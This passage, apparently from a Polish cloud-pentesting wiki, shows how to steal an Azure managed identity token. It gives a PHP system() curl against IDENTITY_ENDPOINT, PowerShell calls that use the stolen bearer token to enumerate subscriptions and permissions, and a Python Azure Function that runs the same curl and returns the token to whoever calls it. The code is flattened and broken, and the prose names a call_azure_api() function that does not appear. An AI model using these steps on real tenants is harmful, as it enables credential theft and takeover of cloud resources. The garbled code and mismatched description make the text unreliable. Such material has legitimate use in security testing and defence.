Pobierz access_token z IDENTITY_HEADER i IDENTITY_ENDPOINT: system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');.
Następnie zapytaj Azure REST API, aby uzyskać ID subskrypcji i więcej.
$Token ='eyJ0eX..'$URI ='https://management.azure.com/subscriptions?api-version=2020-01-01'# $URI = 'https://graph.microsoft.com/v1.0/applications'$RequestParams =@{Method ='GET'Uri = $URIHeaders =@{'Authorization'="Bearer $Token"}}(Invoke-RestMethod @RequestParams).value# List resources and check for runCommand privileges$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE/providers/Microsoft.Authorization/permissions?apiversion=2015-07-01'
Wersja Azure API za pomocą Pythona
To skrypt w języku Python, który umożliwia korzystanie z Azure API. Skrypt ten jest napisany w wersji Pythona.
Aby użyć tego skryptu, musisz podać ważny token dostępu <access_token>. Następnie możesz wywołać funkcję call_azure_api(), która zwróci odpowiedź w formacie JSON.
import logging, osimport azure.functions as funcdefmain(req: func.HttpRequest) -> func.HttpResponse:logging.info('Python HTTP trigger function processed a request.')IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']IDENTITY_HEADER = os.environ['IDENTITY_HEADER']cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()return func.HttpResponse(val, status_code=200)
Lista usług
Strony w tej sekcji są uporządkowane według usług Azure. Znajdziesz tutaj informacje na temat każdej usługi (jak działa i jakie ma możliwości), a także jak przeprowadzić ich enumerację.